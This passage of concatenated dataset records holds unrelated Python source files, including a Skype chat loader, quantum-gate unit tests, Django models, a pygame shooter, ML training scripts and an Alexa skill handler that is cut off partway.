All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nimport json\nimport os\n\nimport luigi\n\nfrom servicecatalog_puppet.workflow.portfolio.portfolio_management import (\n portfolio_management_task,\n)\n\n\nclass RequestPolicyTask(portfolio_management_task.PortfolioManagementTask):\n type = luigi.Parameter()\n region = luigi.Parameter()\n account_id = luigi.Parameter()\n organization = luigi.Parameter(default=None)\n\n def params_for_results_display(self):\n return {\n \"type\": self.type,\n \"account_id\": self.account_id,\n \"region\": self.region,\n \"cache_invalidator\": self.cache_invalidator,\n }\n\n def run(self):\n if self.organization is not None:\n p = f\"data/{self.type}/{self.region}/organizations/\"\n if not os.path.exists(p):\n os.makedirs(p, exist_ok=True)\n path = f\"{p}/{self.organization}.json\"\n else:\n p = f\"data/{self.type}/{self.region}/accounts/\"\n if not os.path.exists(p):\n os.makedirs(p, exist_ok=True)\n path = f\"{p}/{self.account_id}.json\"\n\n f = open(path, \"w\")\n f.write(json.dumps(self.param_kwargs, indent=4, default=str,))\n f.close()\n self.write_output(self.param_kwargs)\n","sub_path":"servicecatalog_puppet/workflow/portfolio/sharing_management/request_policy_task.py","file_name":"request_policy_task.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"605197150","text":"# -*- coding: utf-8 -*- \nfrom base_messenger import *\nfrom skpy import Skype\n\nclass SkypeMessenger(BaseMessenger):\n \n def __login__(self, login, password):\n try:\n self.sk = Skype(login, password)\n except:\n self.login_error(True)\n self.user_name = self.get_name_from_user(self.sk.user)\n\n def load_contacts(self):\n self.contacts = []\n ids = []\n # recent chats\n for row in self.sk.chats.recent():\n contact = self.sk.chats.chat(row)\n if hasattr(contact, \"topic\"):\n contact_id = contact.id\n ids.append(contact_id)\n avatar_link = \"\"\n self.contacts.append({\n \"name\": contact.topic,\n \"img\": avatar_link,\n \"id\": contact_id\n })\n else:\n self.contacts.append({\n \"name\": self.get_name_from_user(contact.user),\n \"img\": contact.user.avatar,\n \"id\": contact.id\n })\n # all contacts\n for contact in self.sk.contacts:\n avatar_link = contact.avatar\n if hasattr(contact, \"chat\"):\n contact_id = contact.chat.id\n if contact_id not in ids:\n self.contacts.append({\n \"name\": self.get_name_from_user(contact),\n \"img\": avatar_link,\n \"id\": contact_id\n })\n\n def load_messages(self, contact_id, date_from=None, date_to=None):\n self.messages = self.recursive_load_messages(contact_id, date_from)\n\n def recursive_load_messages(self, contact_id, date_from=None, date_to=None):\n chat = self.sk.chats[contact_id]\n messages = []\n try:\n l = chat.getMsgs()\n for row in l:\n message = {}\n message[\"content\"] = self.unicode_text(row.content)\n message[\"user_name\"] = self.get_name_from_user(row.user)\n message[\"date\"] = int(time.mktime(row.time.timetuple())) - self.timezone_offset * 60\n if message[\"date\"] < date_from:\n return messages\n messages.append(message)\n if len(messages) > 0:\n messages.extend(self.recursive_load_messages(contact_id, date_from, date_to))\n except:\n self.lh.capture_exception()\n return messages\n\n def get_name_from_user(self, user):\n \"\"\"Find the name.\"\"\"\n name = \"\"\n if user.name.first is not None:\n name += user.name.first + \" \"\n if user.name.last is not None:\n name += user.name.last + \" \"\n if name == \"\":\n 
name = user.id\n return self.unicode_text(name.strip())\n","sub_path":"server/messengers/skype_messenger.py","file_name":"skype_messenger.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117863333","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom tests.test_base import *\nfrom qgate.script import *\nfrom qgate.simulator.pyruntime import adjoint\nfrom qgate.model.decompose import decompose\nimport math\nimport cmath\nimport numpy as np\n\nclass TestExpBase(SimulatorTestBase) :\n\n @classmethod\n def setUpClass(cls):\n if cls is TestExpBase:\n raise unittest.SkipTest()\n super(TestExpBase, cls).setUpClass()\n\n def run_sim(self, circuit) :\n sim = self._run_sim(circuit, isolate_circuits = False)\n states = sim.qubits.get_states()\n return states\n\n def get_matrix(self, gate) :\n mat = gate.gate_type.pymat()\n if gate.adjoint :\n mat = adjoint(mat)\n return mat\n\n def gate_matrix_product(self, ops) :\n product = np.eye(2, dtype=np.float64)\n for gate in ops :\n mat = self.get_matrix(gate)\n product = np.matmul(product, mat)\n return product\n\n def test_expia(self) :\n qregs = new_qregs(4)\n circuit = [H(qreg) for qreg in qregs]\n states_h = self.run_sim(circuit)\n v = 1. / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_h, v))\n\n circuit += [ Expia(math.pi / 8)(qregs[0]) ]\n states_hexp = self.run_sim(circuit)\n\n v = cmath.exp(1.j * math.pi / 8) / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_hexp, v))\n\n def test_expiz(self) :\n qregs = new_qregs(4)\n circuit = [H(qreg) for qreg in qregs]\n states_h = self.run_sim(circuit)\n v = 1. / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_h, v))\n\n circuit += [ Expiz(math.pi / 8)(qregs[0]) ]\n states_hexp = self.run_sim(circuit)\n\n v = cmath.exp(1.j * math.pi / 8) / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_hexp[0::2], v))\n self.assertTrue(np.allclose(states_hexp[1::2], np.conjugate(v)))\n\n def test_exp_x(self) :\n theta = math.pi / 8.\n I = np.eye(2, dtype=np.complex128)\n x = np.array([[0, 1], [1, 0]], dtype=np.complex128) \n expix_ref = math.cos(theta) * I + 1.j * math.sin(theta) * x\n\n qreg = new_qreg()\n expix_dec = decompose(Expi(theta)(X(qreg)))\n expix_mat = self.gate_matrix_product(expix_dec)\n\n # print([gate.gate_type for gate in expix_dec])\n self.assertTrue(np.allclose(expix_ref, expix_mat))\n\n def test_exp_y(self) :\n theta = math.pi / 8.\n I = np.eye(2, dtype=np.complex128)\n y = np.array([[0, - 1.j], [1j, 0]], dtype=np.complex128) \n expiy_ref = math.cos(theta) * I + 1.j * math.sin(theta) * y\n\n qreg = new_qreg()\n expiy_dec = decompose(Expi(theta)(Y(qreg)))\n expiy_mat = self.gate_matrix_product(expiy_dec)\n\n self.assertTrue(np.allclose(expiy_ref, expiy_mat))\n\n def test_exp_z(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n z = np.array([[1, 0], [0, -1]], dtype=np.complex128) \n expiz_ref = math.cos(theta) * i + 1.j * math.sin(theta) * z\n\n qreg = new_qreg()\n expiz_dec = decompose(Expi(theta)(Z(qreg)))\n expiz_mat = self.gate_matrix_product(expiz_dec)\n\n self.assertTrue(np.allclose(expiz_ref, expiz_mat))\n\n def test_exp_id(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n expii_ref = cmath.exp(theta * 1.j) * i\n\n qreg = new_qreg()\n expii_dec = decompose(Expi(theta)(I(qreg)))\n expii_mat = self.gate_matrix_product(expii_dec)\n \n #print([gate.gate_type for gate in expii_dec])\n 
#print(expii_ref) print(expii_mat)\n self.assertTrue(np.allclose(expii_ref, expii_mat))\n\n def test_exp_xx(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n expii_ref = cmath.exp(theta * 1.j) * i\n\n qreg = new_qreg()\n expii_dec = decompose(Expi(theta)(X(qreg), X(qreg)))\n expii_mat = self.gate_matrix_product(expii_dec)\n \n #print([gate.gate_type for gate in expii_dec])\n #print(expii_ref) print(expii_mat)\n self.assertTrue(np.allclose(expii_ref, expii_mat))\n \nimport sys\nthis = sys.modules[__name__]\ncreateTestCases(this, 'TestExp', TestExpBase)\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_exp_gate.py","file_name":"test_exp_gate.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163029985","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime as dt\nfrom django.db.models import Q\n\n\n# Create your models here.\nclass Profile(models.Model):\n username = models.ForeignKey(User, on_delete=models.CASCADE, related_name='profile')\n profile_pic = models.ImageField(upload_to='images/', default='default.png')\n bio = models.TextField(max_length=500, default=\"\", blank=True)\n name = models.CharField(blank=True, max_length=120)\n country = models.ForeignKey('Countries',on_delete=models.CASCADE)\n email = models.EmailField(max_length=100, blank=True)\n\n def __str__(self):\n return f'{self.username} profile'\n\n\nclass Countries(models.Model):\n countries = models.CharField(max_length=100)\n\n def __str__(self):\n return self.countries\n\n class Meta:\n ordering = ['countries']\n\n\n def save_country(self):\n self.save()\n\n @classmethod\n def delete_country(cls,countries):\n cls.objects.filter(countries=countries).delete()\n\n\nclass Post(models.Model):\n title = models.CharField(max_length=150)\n photo = models.ImageField(upload_to='landingpage/')\n link = models.URLField(max_length=255)\n description = models.TextField(max_length=255)\n technologies = models.ManyToManyField('Technologies', max_length=255)\n username = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"posts\")\n date = models.DateTimeField(auto_now_add=True, blank=True)\n\n def __str__(self):\n return self.title\n \n @classmethod\n def all_posts(cls):\n return cls.objects.all()\n \n @classmethod\n def search_post(cls,search_term):\n posts = cls.objects.filter(Q(username__username=search_term) | Q(title__icontains=search_term))\n return posts\n\n def save_post(self):\n self.save()\n\n def delete_post(self):\n self.delete()\n\n\nclass Technologies(models.Model):\n technologies = models.CharField(max_length=100)\n\n def __str__(self):\n return self.technologies\n\n def save_technology(self):\n self.save()\n\n @classmethod\n def delete_technology(cls,technologies):\n cls.objects.filter(technologies=technologies).delete()\n\nclass Rating(models.Model):\n rating = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n )\n design = models.IntegerField(choices=rating,blank=True,default=0)\n usability = models.IntegerField(choices=rating,blank=True,default=0)\n creativity = models.IntegerField(choices=rating,blank=True,default=0)\n content = models.IntegerField(choices=rating,blank=True,default=0)\n overall_score = models.IntegerField(blank=True,default=0)\n post = models.ForeignKey(Post,on_delete=models.CASCADE)\n profile = 
models.ForeignKey(Profile,on_delete=models.CASCADE)\n\n def save_rating(self):\n self.save()\n\n def __str__(self):\n return f'{self.post} Rating'\n\n","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"442794479","text":"# _*_ coding: utf-8 _*_\n# @Time : 2019/5/11 22:10\n# @Author : Ole211\n# @Site : \n# @File : views.py \n# @Software : PyCharm\nfrom django.shortcuts import render\nfrom django.db import connection\n\n\ndef index(request):\n cur = connection.cursor()\n # cur.execute(\"insert into book(id, name, author) values(null, '西游记', '施耐庵')\")\n cur.execute(\"select * from book\")\n rows = cur.fetchall()\n for row in rows:\n print(row)\n return render(request, 'index.html')","sub_path":"django-tutorial/chapter04/db_operation_demo/db_operation_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"203277158","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import MaxAbsScaler\r\nfrom mpl_toolkits import mplot3d\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\ndata=pd.read_csv('ND2016.csv', sep=',',header=0)\r\ndata = np.array(data)\r\ntrain = data\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.ensemble import RandomForestRegressor\r\n\r\nprint(len(train))\r\n\r\ntrain=np.array(train)\r\n\r\ny_train=np.zeros(len(train))\r\n\r\n\r\nfor i in range(len(train)):\r\n y_train[i]=train[i][2]\r\ntrain = np.delete(train, 2, axis=1)\r\n\r\nimport pickle \r\n\r\nreg = SVR(gamma = 0.0005, kernel = 'rbf', C=500000, verbose=True).fit(train, y_train)\r\n\r\nn=10\r\nreg_error = {}\r\n\r\ny_pred = reg.predict(train)\r\nfor i in range(n):\r\n error = y_train - y_pred\r\n reg_error[i] = RandomForestRegressor(max_depth = 30, n_estimators = 500).fit(train, error)\r\n error_pred = reg_error[i].predict(train)\r\n y_pred = y_pred + error_pred\r\n\r\n# save all 10 models to joblib\r\n\r\npickle.dump(reg, open('base_model.sav', 'wb'))\r\npickle.dump(reg_error[0], open('error_model_1.sav','wb'))\r\npickle.dump(reg_error[1], open('error_model_2.sav','wb'))\r\npickle.dump(reg_error[2], open('error_model_3.sav','wb'))\r\npickle.dump(reg_error[3], open('error_model_4.sav','wb'))\r\npickle.dump(reg_error[4], open('error_model_5.sav','wb'))\r\npickle.dump(reg_error[5], open('error_model_6.sav','wb'))\r\npickle.dump(reg_error[6], open('error_model_7.sav','wb'))\r\npickle.dump(reg_error[7], open('error_model_8.sav','wb'))\r\npickle.dump(reg_error[8], open('error_model_9.sav','wb'))\r\npickle.dump(reg_error[9], open('error_model_10.sav','wb'))\r\nprint(\"MODELS BUILT AND SAVED\")\r\n\r\n\r\n\r\n","sub_path":"model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"471254246","text":"from gamelib import *\r\n\r\ngame = Game(1024,768,\"Billy Bob And The Munster Uprising\")\r\n#Game graphics\r\n\r\n#Background\r\nbk = Animation(\"Background.jpg\",2,game,4096/2,768)\r\ngame.setBackground(bk)\r\n\r\nplay = Image(\"play.png\",game)\r\nplay.moveTo(1024/2,600)\r\n\r\nhtp = Image(\"How-To-Play.png\",game)\r\nhtp.moveTo(play.x,play.y + 100)\r\n\r\nTitle1 = 
Image(\"Billy-Bob-and-The-.png\",game)\r\nTitle1.moveTo(play.x,play.y - 400)\r\nTitle2 = Image(\"Munster-Uprising.png\",game)\r\nTitle2.moveTo(play.x,play.y - 300)\r\n\r\nBack = Image(\"Back.png\",game)\r\nBack.moveTo(100,700)\r\n\r\nNext = Image(\"Next.png\",game)\r\nNext.moveTo(1024/2 + 400,768/2 + 350)\r\n\r\n#Sound\r\nShoot = Sound(\"shoot.wav\",1)\r\n\r\n#Hero\r\nBilly = Animation(\"Billy_Right.png\",4,game,264/4,96)\r\nBilly.moveTo(20,400)\r\nBilly.resizeBy(20)\r\n\r\n#Ground\r\nground = Image(\"ground.jpg\",game)\r\nground.moveTo(Billy.x,660)\r\n\r\n\r\n#Bullet\r\nbullet = Image(\"bullet.png\",game,use_alpha = False)\r\nbullet.resizeBy(-85)\r\nbullet.rotateBy(90,\"right\")\r\nbullet.visible = False\r\n\r\n\r\n\r\n#Monsters\r\nMaggots = []\r\nfor index in range(30):\r\n Maggots.append(Animation(\"cave-maggot-giant.png\",10,game,580/10,44,use_alpha = False))\r\n Maggots[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Maggots[index].moveTo(x,ground.y - 40)\r\n\r\nZombies = []\r\nfor index in range(30):\r\n Zombies.append(Animation(\"zombie_frame.png\",4,game,136/4,96,use_alpha = False))\r\n Zombies[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Zombies[index].moveTo(x,ground.y - 75)\r\n\r\nGhosts = []\r\nfor index in range(30):\r\n Ghosts.append(Animation(\"ghost_frame.png\",5,game,246/5,96,use_alpha = False))\r\n Ghosts[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Ghosts[index].moveTo(x,ground.y - 300)\r\n\r\n \r\n#Title Screen\r\nHowToPlay = False\r\nwhile not game.over and HowToPlay == False:\r\n game.processInput()\r\n \r\n game.scrollBackground(\"left\",2)\r\n Title1.draw()\r\n Title2.draw()\r\n\r\n\r\n ground.draw()\r\n play.draw()\r\n \r\n if play.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n \r\n game.update(30)\r\ngame.over = False\r\n#How To Play\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n game.scrollBackground(\"left\",2)\r\n \r\n ground.draw()\r\n\r\n game.drawText(\"A = Move Left\",1024/2 - 100,768/2 )\r\n game.drawText(\"D = Move Right\",1024/2 - 100,768/2 + 50)\r\n game.drawText(\"Left Click = Shoot\",1024/2 - 100,768/2 + 100)\r\n\r\n Next.draw()\r\n\r\n if Next.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n \r\n game.update(30)\r\ngame.over = False\r\n\r\n#Wave 1\r\nwave1complete = 0\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n landed = False\r\n\r\n game.scrollBackground(\"left\",2)\r\n \r\n ground.draw()\r\n bullet.move()\r\n Billy.draw()\r\n Billy.stop()\r\n \r\n if Billy.collidedWith(ground,\"rectangle\"):\r\n landed = True\r\n\r\n for times in range(100):\r\n ground.moveTo(Billy.x,660)\r\n \r\n for index in range(30): \r\n if Maggots[index].x <= Billy.x:\r\n Maggots[index].setSpeed(3,270)\r\n Maggots[index].move() \r\n if Maggots[index].x >= Billy.x:\r\n Maggots[index].setSpeed(3,90)\r\n Maggots[index].move()\r\n \r\n if Zombies[index].x <= Billy.x:\r\n Zombies[index].setSpeed(2,270)\r\n Zombies[index].move()\r\n if Zombies[index].x >= Billy.x:\r\n Zombies[index].setSpeed(3,90)\r\n Zombies[index].move()\r\n \r\n Ghosts[index].moveTowards(Billy,5)\r\n\r\n\r\n #Collision w/ Billy\r\n if Maggots[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Maggots[index].visible = False\r\n wave1complete += 1\r\n if Zombies[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Zombies[index].visible = False\r\n wave1complete += 1\r\n if Ghosts[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Ghosts[index].visible = 
False\r\n wave1complete += 1\r\n\r\n #Collision w/ bullet\r\n if Maggots[index].collidedWith(bullet):\r\n Maggots[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n if Zombies[index].collidedWith(bullet):\r\n Zombies[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n if Ghosts[index].collidedWith(bullet):\r\n Ghosts[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n\r\n if bullet.isOffScreen():\r\n bullet.visible = False\r\n \r\n \r\n if Billy.health == 0:\r\n game.over = True\r\n\r\n \r\n ##Controls\r\n if landed == False:\r\n Billy.y += 3 \r\n if keys.Pressed[K_d]:\r\n Billy.x += 10\r\n Billy.nextFrame()\r\n if keys.Pressed[K_a]:\r\n Billy.x -= 10 \r\n Billy.prevFrame()\r\n if keys.Pressed[K_SPACE]:\r\n Billy.y -= 20\r\n landed == False\r\n if mouse.LeftClick:\r\n Shoot.play()\r\n bullet.visible = True\r\n bullet.moveTo(Billy.x,Billy.y)\r\n bullet.moveTowards(mouse,100)\r\n\r\n\r\n game.drawText(\"Health: \" + str(Billy.health),Billy.x - 50,Billy.y - 100)\r\n game.update(30)\r\n\r\n if wave1complete == 90:\r\n game.over = True\r\ngame.quit()\r\n","sub_path":"projectt.py","file_name":"projectt.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"296021542","text":"import os\nimport argparse\nimport json\nimport collections\nfrom datetime import datetime\n\nimport logging\n\nfrom train import char_lstm_classifier, cnn_classifier\n\ndef init_logger(path:str):\n if not os.path.exists(path):\n os.makedirs(path)\n logger = logging.getLogger()\n logger.handlers = []\n logger.setLevel(logging.DEBUG)\n debug_fh = logging.FileHandler(os.path.join(path, \"debug.log\"))\n debug_fh.setLevel(logging.DEBUG)\n\n info_fh = logging.FileHandler(os.path.join(path, \"info.log\"))\n info_fh.setLevel(logging.INFO)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n info_formatter = logging.Formatter('%(asctime)s | %(levelname)-8s | %(message)s')\n debug_formatter = logging.Formatter('%(asctime)s | %(levelname)-8s | %(message)s | %(lineno)d:%(funcName)s')\n\n ch.setFormatter(info_formatter)\n info_fh.setFormatter(info_formatter)\n debug_fh.setFormatter(debug_formatter)\n\n logger.addHandler(ch)\n logger.addHandler(debug_fh)\n logger.addHandler(info_fh)\n\n return logger\n\n\ndef train_model(args, builder_class):\n hparams_path = args.hparams\n\n with open(hparams_path, \"r\") as f_handle:\n hparams_dict = json.load(f_handle)\n\n timestamp = datetime.now().strftime('%Y%m%d-%H%M%S')\n root_dir = os.path.join(hparams_dict[\"root_dir\"], \"%s/\" % timestamp)\n\n logger = init_logger(root_dir)\n logger.info(\"Loaded hyper-parameter configuration from file: %s\" % hparams_path)\n logger.info(\"Hyper-parameters: %s\" % str(hparams_dict))\n hparams_dict[\"root_dir\"] = root_dir\n\n hparams = collections.namedtuple(\"HParams\", sorted(hparams_dict.keys()))(**hparams_dict)\n\n with open(os.path.join(root_dir, \"hparams.json\"), \"w\") as f_handle:\n json.dump(hparams._asdict(), f_handle, indent=2)\n\n # Build graph\n model = builder_class(hparams, args.data)\n model.train()\n\n\ndef load_and_evaluate(args, builder_class):\n hparams_path = args.hparams\n\n with open(hparams_path, \"r\") as f_handle:\n hparams_dict = json.load(f_handle)\n\n timestamp = datetime.now().strftime('%Y%m%d-%H%M%S')\n root_dir = os.path.join(hparams_dict[\"root_dir\"], \"%s/\" % timestamp)\n\n logger = init_logger(root_dir)\n logger.info(\"Loaded hyper-parameter 
configuration from file: %s\" % hparams_path)\n    logger.info(\"Hyper-parameters: %s\" % str(hparams_dict))\n    hparams_dict[\"root_dir\"] = root_dir\n\n    hparams = collections.namedtuple(\"HParams\", sorted(hparams_dict.keys()))(**hparams_dict)\n\n    with open(os.path.join(root_dir, \"hparams.json\"), \"w\") as f_handle:\n        json.dump(hparams._asdict(), f_handle, indent=2)\n\n    # Build graph\n    model = builder_class(hparams, args.data)\n    # Invoked from main as \"load_and_evaluate(args, char_lstm_classifier.TextClassifier)\".\n    # char_lstm_classifier.py implements a class named TextClassifier;\n    # calling \"char_lstm_classifier.TextClassifier(hparams, args.data)\" creates\n    # a TextClassifier object named model, passing in the arguments.\n\n    model.evaluate(args.evaluate)\n    # Run the created model object.\n\n\nif __name__ == \"__main__\":\n    arg_parser = argparse.ArgumentParser(description=\"Named Entity Tagger.\")\n    arg_parser.add_argument(\"--hparams\", dest=\"hparams\", required=True,\n                            help=\"Path to the file that contains hyper-parameter settings. (JSON format)\")\n    arg_parser.add_argument(\"--data\", dest=\"data\", type=str, required=True,\n                            help=\"Directory that contains dataset files.\")\n    arg_parser.add_argument(\"--evaluate\", dest=\"evaluate\", type=str, default=None,\n                            help=\"Path to the saved model.\")\n    args = arg_parser.parse_args()\n\n    if args.evaluate is not None:\n        # load_and_evaluate(args, cnn_classifier.TextClassifier)\n        load_and_evaluate(args, char_lstm_classifier.TextClassifier)\n    else:\n        # train_model(args, cnn_classifier.TextClassifier)\n        train_model(args, char_lstm_classifier.TextClassifier)\n\n\n# tensorflow.python.framework.errors_impl.InvalidArgumentError: logits and labels must have the same first dimension, got logits shape [16,9] and labels shape [331]\n# logits shape [16,9] and labels shape [331]","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"303021741","text":"import argparse\n\nfrom .bib import BibFile\nfrom .common import boolize\nfrom .parser import BibParser\n\n\nACTIONS = ['analyse', 'merge']\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--conflict_shortname', '-n', type=str, default='ignore')\nparser.add_argument('--conflict_shortname_compare', '-c', type=str, default=None)\nparser.add_argument('--allow_entry_detect', '-d', type=boolize, default=False)\nparser.add_argument('--strict_entry_required', '-r', type=boolize, default=False)\nparser.add_argument('--strict_entry_optional', '-o', type=boolize, default=False)\nparser.add_argument('--file', '-f', required=True, nargs='+')\nparser.add_argument('--action', '-a', type=str, default='analyse')\nparser.add_argument('--export', '-e', type=str, default=None)\nparser.add_argument('--merge_conflict_shortname', '-mn', type=str, default='ignore')\nparser.add_argument('--merge_conflict_shortname_compare', '-mc', type=str, default=None)\nparser.add_argument('--selected_attrs', '-t', nargs='*', default=None)\n\n\ndef analyse():\n    args = parser.parse_args()\n    bib_parser = BibParser.from_args(args)\n\n    for file in args.file:\n        bib_file = BibFile(file, parser=bib_parser)\n        print('Total', len(bib_file.refs.refs), 'references in', file)\n\n\ndef merge():\n    args = parser.parse_args()\n    bib_parser = BibParser.from_args(args)\n\n    assert args.export\n    bib_files = [BibFile(file, parser=bib_parser) for file in args.file]\n    bib_file = BibFile.merge(\n        *bib_files,\n        conflict_shortname=args.merge_conflict_shortname,\n        
conflict_shortname_compare=args.merge_conflict_shortname_compare,\n )\n selected_attrs = args.selected_attrs\n bib_file.export(\n to=args.export,\n selected_attrs=selected_attrs,\n )\n\n print('Successfully merged to', args.export)\n\n\ndef main():\n args = parser.parse_args()\n\n assert args.action in ACTIONS\n\n if args.action == 'analyse':\n analyse()\n\n elif args.action == 'merge':\n merge()\n\n else:\n raise ValueError('Undefined action', args.action)\n","sub_path":"BibParser/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225106590","text":"# coding:utf-8\r\n\r\nfrom run_classifier import ColaProcessor\r\nimport tokenization\r\nfrom run_classifier import file_based_convert_examples_to_features\r\nimport random\r\n\r\n\r\ndata_name = \"AMPScan\"\r\ninput_root = \"./pre_model_1kmer_600w/tsv_data/\"\r\noutput_root = \"./pre_model_1kmer_600w/tfrecord/\"\r\nvocab_file = \"./vocab/vocab_1kmer.txt\"\r\n\r\n\r\ndef rand_data(input_file, out_file):\r\n with open(input_file) as f:\r\n lines = f.readlines()\r\n random.shuffle(lines)\r\n print(lines)\r\n with open(out_file, \"w\") as f:\r\n for line in lines:\r\n f.write(line)\r\n\r\n\r\nrand_data(input_root + data_name + \"/sorted_train.tsv\",\r\n input_root + data_name + \"/train.tsv\")\r\n\r\nrand_data(input_root + data_name + \"/sorted_dev.tsv\",\r\n input_root + data_name + \"/dev.tsv\")\r\n\r\n\r\nprocessor = ColaProcessor()\r\nlabel_list = processor.get_labels()\r\nexamples = processor.get_dev_examples(input_root + data_name + \"/\")\r\ntrain_file = output_root + data_name + \"/dev.tf_record\"\r\ntokenizer = tokenization.FullTokenizer(\r\n vocab_file=vocab_file, do_lower_case=True)\r\nfile_based_convert_examples_to_features(\r\n examples, label_list, 128, tokenizer, train_file)\r\n\r\nexamples = processor.get_train_examples(input_root + data_name + \"/\")\r\ntrain_file = output_root + data_name + \"/train.tf_record\"\r\ntokenizer = tokenization.FullTokenizer(\r\n vocab_file=vocab_file, do_lower_case=True)\r\nfile_based_convert_examples_to_features(\r\n examples, label_list, 128, tokenizer, train_file)\r\n","sub_path":"ljy_tsv2record.py","file_name":"ljy_tsv2record.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238713770","text":"class Solution:\n '''\n 执行用时 : 48 ms, 在所有 Python3 提交中击败了75.54%的用户\n 内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.66%的用户\n\n 方法描述:指针(current)从(0,0)开始,首先向右,\n 一旦发现超过了矩阵边界或者已经被访问过,按照顺时针方向变换方向,继续前进。\n '''\n def spiralOrder(self, matrix):\n m = len(matrix)\n if m == 0: return []\n n = len(matrix[0])\n judge = [[0 for i in range(n)] for j in range(m)]\n direction = [(0,1),(1,0),(0,-1),(-1,0)]\n direction_ind = 0\n current = (0,0)\n res = list()\n c = 0\n while c=m or y >= n or x < 0 or y < 0:\n direction_ind += 1\n ind = direction_ind % 4\n x = current[0]+direction[ind][0]\n y = current[1]+direction[ind][1]\n current = (x,y)\n elif judge[x][y]:\n direction_ind += 1\n ind = direction_ind % 4\n x = current[0]+direction[ind][0]\n y = current[1]+direction[ind][1]\n current = (x,y)\n else:\n current = (x,y)\n return res\n\n def standard_spiralOrder(self,matrix):\n if not matrix: return []\n R, C = len(matrix), len(matrix[0])\n seen = [[False] * C for _ in matrix]\n ans = []\n dr = [0, 1, 0, -1]\n dc = [1, 0, -1, 0]\n r = c = di = 0\n for _ in range(R * C):\n ans.append(matrix[r][c])\n seen[r][c] = 
True\n            cr, cc = r + dr[di], c + dc[di]\n            if 0 <= cr < R and 0 <= cc < C and not seen[cr][cc]:\n                r, c = cr, cc\n            else:\n                di = (di + 1) % 4\n                r, c = r + dr[di], c + dc[di]\n        return ans\n","sub_path":"Problems/0054-SpiralOrder.py","file_name":"0054-SpiralOrder.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"613507931","text":"from __future__ import print_function\n\nimport urllib2\nimport json\nfrom datetime import datetime, timedelta\n\n\ndef lambda_handler(event, context):\n    \"\"\"\n    Route the incoming request based on type (LaunchRequest, IntentRequest,\n    etc.) The JSON body of the request is provided in the event parameter.\n    \"\"\"\n    if event['request']['type'] == \"LaunchRequest\":\n        return get_welcome_response()\n    elif event['request']['type'] == \"IntentRequest\":\n        return on_intent(event['request'], event['session'])\n    elif event['request']['type'] == \"SessionEndedRequest\":\n        return handle_session_end_request()\n\n\ndef on_intent(intent_request, session):\n    \"\"\" Called when the user specifies an intent for this skill \"\"\"\n    intent = intent_request['intent']\n    intent_name = intent_request['intent']['name']\n\n    # Dispatch to your skill's intent handlers\n    if intent_name == \"SnowDayChancesIntent\":\n        return get_chances_of_school(intent, session)\n    elif intent_name == \"AMAZON.HelpIntent\":\n        return get_welcome_response()\n    elif intent_name == 